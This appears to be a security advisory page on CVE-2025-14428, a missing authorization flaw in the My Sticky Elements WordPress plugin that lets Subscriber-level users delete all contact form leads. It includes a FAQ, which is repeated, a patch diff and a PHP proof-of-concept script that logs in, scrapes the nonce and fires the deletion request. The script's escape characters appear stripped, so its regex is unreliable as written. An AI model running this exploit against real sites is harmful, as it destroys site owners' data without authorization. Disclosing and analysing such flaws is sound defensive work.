What is CVE-2025-14428?

CVE-2025-14428 is a medium-severity vulnerability in the My Sticky Elements WordPress plugin, which allows authenticated users with Subscriber-level access and above to delete all contact form leads due to a missing authorization check in the bulk deletion function.

How does the vulnerability work?

The vulnerability arises from the absence of a capability check in the ‘my_sticky_elements_bulks’ function. Authenticated users can exploit this by sending a crafted POST request to the admin-ajax.php endpoint, triggering the bulk deletion of contact form leads without proper authorization.

Who is affected by this vulnerability?

All installations of the My Sticky Elements plugin up to and including version 2.3.3 are affected. Administrators should check their plugin version and look for any unauthorized access or deletions in their contact form leads.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the My Sticky Elements plugin. If it is version 2.3.3 or earlier, your site is at risk. Additionally, review logs for any suspicious activity related to contact form lead deletions.

What is the recommended fix for this vulnerability?

The recommended fix is to update the My Sticky Elements plugin to version 2.3.4 or later, where the vulnerability has been patched by adding the necessary capability checks to the affected functions.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, meaning that while the vulnerability poses a significant risk of data loss, it does not allow for privilege escalation or remote code execution. Administrators should prioritize addressing this issue.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates the vulnerability by showing how an attacker can authenticate as a Subscriber and send a crafted request to the vulnerable endpoint. This demonstrates the ease with which unauthorized bulk deletions can be executed.

What are the potential consequences of this vulnerability?

Successful exploitation can lead to complete data loss of all contact form submissions collected by the My Sticky Elements plugin. This can disrupt business operations and communication for site owners relying on these leads.

What steps can I take to mitigate the risk?

In addition to updating the plugin, consider implementing strict user role management to limit access to sensitive functions. Regularly audit user permissions and monitor logs for unusual activity.

Are there any other vulnerabilities associated with this plugin?

The same authorization fix applied to the bulk deletion function was also implemented in two other AJAX functions, indicating a broader review of the plugin’s security. Administrators should remain vigilant for any future updates or security advisories.

How can I stay informed about vulnerabilities like CVE-2025-14428?

To stay informed, subscribe to security mailing lists, follow reputable security blogs, and monitor the official WordPress plugin repository for updates and security notices related to the plugins you use.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately review your user accounts for unauthorized access, check your logs for unusual activity, and restore from a clean backup if necessary. Additionally, consider consulting with a security professional.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14428: My Sticky Elements <= 2.3.3 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Bulk Lead Deletion (mystickyelements)

CVE ID CVE-2025-14428

Plugin mystickyelements

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.3.3

Patched Version 2.3.4

Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-14428:
The My Sticky Elements WordPress plugin, versions up to and including 2.3.3, contains a missing authorization vulnerability in its bulk deletion function. This flaw allows authenticated attackers with Subscriber-level permissions or higher to delete all contact form leads stored by the plugin, resulting in unauthorized data loss. The CVSS score of 4.3 reflects a medium-severity integrity impact.

The root cause is the absence of a capability check in the `my_sticky_elements_bulks()` function. This function is defined in the `mystickyelements-admin.php` file. The vulnerable code, prior to line 1787, directly processes the AJAX request after verifying the nonce. The function does not validate if the current user has the administrative capability required to perform bulk deletions. The diff shows the function was accessible via the WordPress AJAX handler (`admin-ajax.php`) with the corresponding action hook.

An attacker can exploit this vulnerability by sending a crafted POST request to the `/wp-admin/admin-ajax.php` endpoint. The request must include the `action` parameter set to `my_sticky_elements_bulks` and a valid `wpnonce` parameter. The nonce is required but is not a sufficient security control, as it is available to low-privileged users through the plugin’s frontend localization script. With these parameters, an authenticated Subscriber can trigger the bulk deletion routine, which executes a database operation to remove all lead entries.

The patch adds a mandatory capability check at the beginning of the vulnerable function. In `mystickyelements-admin.php`, line 1797, the code now includes `if ( ! current_user_can( ‘manage_options’ ) ) { wp_die(0); }`. This check ensures only users with the `manage_options` capability, typically Administrators, can execute the function. The same authorization fix was also applied to two other AJAX functions, `myStickyelements_intro_popup_action()` and `mystickyelements_admin_send_message_to_owner()`, indicating a broader authorization review.

Successful exploitation leads to complete data loss for all contact form submissions collected by the My Sticky Elements plugin. Attackers can irreversibly delete this data, causing disruption to site owners who rely on these leads for communication or business operations. The impact is a direct violation of data integrity and availability, though it does not permit privilege escalation or remote code execution.

Differential between vulnerable and patched code

Code Diff

--- a/mystickyelements/mystickyelements-admin.php
+++ b/mystickyelements/mystickyelements-admin.php
@@ -1661,6 +1661,10 @@
 		}

 		public function myStickyelements_intro_popup_action() {
+			if ( ! current_user_can( 'manage_options' ) ) {
+				wp_die(0);
+			}
+
 			if( !empty( $_REQUEST['nonce'] ) && wp_verify_nonce( $_REQUEST['nonce'], 'myStickyelements_update_popup_status' ) ) {
 				update_option( "mystickyelements_intro_popup", "hide" );
 			}
@@ -1669,6 +1673,10 @@
 		}

 		public function mystickyelements_admin_send_message_to_owner() {
+
+			if ( ! current_user_can( 'manage_options' ) ) {
+				wp_die(0);
+			}
 			$response = array();
 			$response['status'] = 0;
 			$response['error'] = 0;
@@ -1787,7 +1795,11 @@

 		public function my_sticky_elements_bulks(){
 			global $wpdb;
-
+
+			if ( ! current_user_can( 'manage_options' ) ) {
+				wp_die(0);
+			}
+
 			check_ajax_referer( 'mystickyelements', 'wpnonce' );

 			if( isset($_POST['wpnonce']) ){
--- a/mystickyelements/mystickyelements-front.php
+++ b/mystickyelements/mystickyelements-front.php
@@ -36,10 +36,37 @@

             wp_enqueue_style('font-awesome-css', plugins_url('/css/font-awesome.min.css', __FILE__), array() , MY_STICKY_ELEMENT_VERSION);
             wp_enqueue_style('mystickyelements-front-css', plugins_url('/css/mystickyelements-front'. esc_attr($min) .'.css', __FILE__), array(), MY_STICKY_ELEMENT_VERSION );
-
+			$custom_css = '';
+
             // Add Themme custom CSS
-           if (  isset($contact_form['form_css']) || isset($general_settings['tabs_css']) || ( isset($general_settings['font_family']) && $general_settings['font_family'] != '') ) {
-                $custom_css = '';
+			if ( ( isset($contact_form['direction']) && $contact_form['direction'] == 'RTL'  ) || isset($contact_form['form_css']) || isset($general_settings['tabs_css']) || ( isset($general_settings['font_family']) && $general_settings['font_family'] != '') ) {
+
+				/*
+				 * Call Open Sans Hebrew font file called one when the user choose direction RTL
+				 */
+                $custom_css .= "@font-face {
+					font-family: 'Open Sans Hebrew';
+					src: url('" . plugins_url('/fonts/OpenSansHebrew-Regular.woff', __FILE__) . "') format('woff');
+					font-weight: normal;
+					font-style: normal;
+					font-display: swap;
+				}
+
+				.mystickyelements-contact-form[dir='rtl'],
+				.mystickyelements-contact-form[dir='rtl'] .element-contact-form .contact-form-heading,
+				.mystickyelements-contact-form[dir='rtl'] form.stickyelements-form input,
+				.mystickyelements-contact-form[dir='rtl'] form.stickyelements-form textarea,
+				.mystickyelements-fixed[dir='rtl'] .mystickyelements-social-icon,
+				.mystickyelements-fixed[dir='rtl'] .mystickyelements-social-text,
+				html[dir='rtl'] .mystickyelements-contact-form,
+				html[dir='rtl'] .mystickyelements-contact-form .element-contact-form .contact-form-heading,
+				html[dir='rtl'] .mystickyelements-contact-form form.stickyelements-form input,
+				html[dir='rtl'] .mystickyelements-contact-form form.stickyelements-form textarea,
+				html[dir='rtl'] .mystickyelements-fixed .mystickyelements-social-icon,
+				html[dir='rtl'] .mystickyelements-fixed .mystickyelements-social-text  {
+					font-family: 'Open Sans Hebrew';
+				}
+				";

 				if ( isset($general_settings['font_family']) && $general_settings['font_family'] != '' ) {
 					if(isset($general_settings['font_family'] ) && $general_settings['font_family'] == 'System Stack' ){
@@ -82,9 +109,8 @@
 				}
 				if (isset($general_settings['tabs_css']) && $general_settings['tabs_css'] !='' ) {
 					$custom_css .= trim(strip_tags($general_settings['tabs_css']));
-				}
+				}

-
                 if (!empty($custom_css)) {
 					wp_add_inline_style('mystickyelements-front-css', $custom_css);
                 }
@@ -116,20 +142,21 @@
 			wp_enqueue_script( 'mailcheck-js', plugins_url('/js/mailcheck'.esc_attr($min).'.js', __FILE__), ['jquery'], MY_STICKY_ELEMENT_VERSION, ['strategy'  => 'defer', 'in_footer'=> true ]);
 			wp_enqueue_script('autocomplete-email-js', plugins_url('/js/jquery.email-autocomplete'.esc_attr($min).'.js', __FILE__), ['jquery'], MY_STICKY_ELEMENT_VERSION, ['strategy'  => 'defer', 'in_footer'=> true ]);

+			if( apply_filters('mystickyelements_enable_intlTelInput_library', true ) ) {
+				wp_enqueue_style('intl-tel-input', plugins_url('/intl-tel-input-src/build/css/intlTelInput.css', __FILE__), array(), MY_STICKY_ELEMENT_VERSION);
+
+				wp_enqueue_script('intl-tel-input-js', plugins_url('/intl-tel-input-src/build/js/intlTelInput.js', __FILE__), array('jquery'), MY_STICKY_ELEMENT_VERSION, ['strategy'  => 'defer', 'in_footer'=> true ]);
+			}
+
 			wp_enqueue_script('mystickyelements-fronted-js', plugins_url('/js/mystickyelements-fronted'.esc_attr($min).'.js', __FILE__), array('jquery'), MY_STICKY_ELEMENT_VERSION, ['strategy'  => 'defer', 'in_footer'=> true ] );

             $locale_settings = array(
                 'ajaxurl' => admin_url('admin-ajax.php'),
                 'ajax_nonce' => wp_create_nonce('mystickyelements'),
+				'plugin_url' => MYSTICKYELEMENTS_URL
             );
             wp_localize_script('mystickyelements-fronted-js', 'mystickyelements', $locale_settings);

-
-			wp_enqueue_style('intl-tel-input', plugins_url('/intl-tel-input-src/build/css/intlTelInput.css', __FILE__), array(), MY_STICKY_ELEMENT_VERSION);
-
-			 wp_enqueue_script('intl-tel-input-js', plugins_url('/intl-tel-input-src/build/js/intlTelInput.js', __FILE__), array('jquery'), MY_STICKY_ELEMENT_VERSION, ['strategy'  => 'defer', 'in_footer'=> true ]);
-
-			wp_localize_script('intl-tel-input-js', 'mystickyelement_obj', array('plugin_url' => MYSTICKYELEMENTS_URL));
 		}

         public function mystickyelement_element_footer()
--- a/mystickyelements/mystickyelements.php
+++ b/mystickyelements/mystickyelements.php
@@ -3,7 +3,7 @@
 Plugin Name: myStickyElements
 Plugin URI: https://premio.io/
 Description: myStickyElements is simple yet very effective plugin. It is perfect to fill out usually unused side space on webpages with some additional messages, videos, social widgets ...
-Version: 2.3.3
+Version: 2.3.4
 Author: Premio
 Author URI: https://premio.io/
 Domain Path: /languages
@@ -15,7 +15,7 @@
 define('MYSTICKYELEMENTS_URL', plugins_url('/', __FILE__));  // Define Plugin URL
 define('MYSTICKYELEMENTS_PATH', plugin_dir_path(__FILE__));  // Define Plugin Directory Path
 define('MYSTICKYELEMENTS_BASE', plugin_basename(__FILE__));
-define("MY_STICKY_ELEMENT_VERSION", "2.3.3");
+define("MY_STICKY_ELEMENT_VERSION", "2.3.4");
 if(!defined('MSE_DEV_MODE')) {
     define('MSE_DEV_MODE', false);
 }
@@ -3713,7 +3713,6 @@
 	require_once MYSTICKYELEMENTS_PATH . 'class-help.php';
 	require_once MYSTICKYELEMENTS_PATH . 'mystickyelements-admin.php';
 	require_once MYSTICKYELEMENTS_PATH . 'mystickyelements-front.php';
-	require_once MYSTICKYELEMENTS_PATH . 'includes/class-affiliate.php';
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14428 - My Sticky Elements <= 2.3.3 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Bulk Lead Deletion
<?php

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress and obtain session cookies.
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Visit a frontend page to obtain the localized nonce.
// The plugin localizes the nonce via `wp_localize_script` with the key `mystickyelements.ajax_nonce`.
// We simulate fetching the homepage where the plugin's frontend script is enqueued.
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 0);
$homepage = curl_exec($ch);

// Extract the nonce from the localized JavaScript variable.
// The pattern looks for `ajax_nonce` within the `mystickyelements` object.
preg_match('/ajax_nonces*:s*["']([a-f0-9]+)["']/', $homepage, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
    die('Could not extract nonce. The plugin may not be active on the homepage.');
}

// Step 3: Send the malicious AJAX request to trigger bulk deletion.
$post_data = [
    'action' => 'my_sticky_elements_bulks',
    'wpnonce' => $nonce
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$ajax_response = curl_exec($ch);
curl_close($ch);

// The function may not return a meaningful response on success.
echo "Bulk deletion request sent.n";
echo "Nonce used: $noncen";
echo "Response: $ajax_responsen";

?>

Frequently Asked Questions

What is CVE-2025-14428?
Overview of the vulnerability
CVE-2025-14428 is a medium-severity vulnerability in the My Sticky Elements WordPress plugin, which allows authenticated users with Subscriber-level access and above to delete all contact form leads due to a missing authorization check in the bulk deletion function.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from the absence of a capability check in the ‘my_sticky_elements_bulks’ function. Authenticated users can exploit this by sending a crafted POST request to the admin-ajax.php endpoint, triggering the bulk deletion of contact form leads without proper authorization.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the My Sticky Elements plugin up to and including version 2.3.3 are affected. Administrators should check their plugin version and look for any unauthorized access or deletions in their contact form leads.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the installed version of the My Sticky Elements plugin. If it is version 2.3.3 or earlier, your site is at risk. Additionally, review logs for any suspicious activity related to contact form lead deletions.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the My Sticky Elements plugin to version 2.3.4 or later, where the vulnerability has been patched by adding the necessary capability checks to the affected functions.
What does the CVSS score of 4.3 indicate?
Understanding the severity level
A CVSS score of 4.3 indicates a medium severity level, meaning that while the vulnerability poses a significant risk of data loss, it does not allow for privilege escalation or remote code execution. Administrators should prioritize addressing this issue.
How does the proof of concept demonstrate the vulnerability?
Explaining the exploit method
The proof of concept illustrates the vulnerability by showing how an attacker can authenticate as a Subscriber and send a crafted request to the vulnerable endpoint. This demonstrates the ease with which unauthorized bulk deletions can be executed.
What are the potential consequences of this vulnerability?
Impact on data integrity
Successful exploitation can lead to complete data loss of all contact form submissions collected by the My Sticky Elements plugin. This can disrupt business operations and communication for site owners relying on these leads.
What steps can I take to mitigate the risk?
Preventive measures
In addition to updating the plugin, consider implementing strict user role management to limit access to sensitive functions. Regularly audit user permissions and monitor logs for unusual activity.
Are there any other vulnerabilities associated with this plugin?
Broader security implications
The same authorization fix applied to the bulk deletion function was also implemented in two other AJAX functions, indicating a broader review of the plugin’s security. Administrators should remain vigilant for any future updates or security advisories.
How can I stay informed about vulnerabilities like CVE-2025-14428?
Keeping up with security news
To stay informed, subscribe to security mailing lists, follow reputable security blogs, and monitor the official WordPress plugin repository for updates and security notices related to the plugins you use.
What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect your site has been compromised, immediately review your user accounts for unauthorized access, check your logs for unusual activity, and restore from a clean backup if necessary. Additionally, consider consulting with a security professional.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations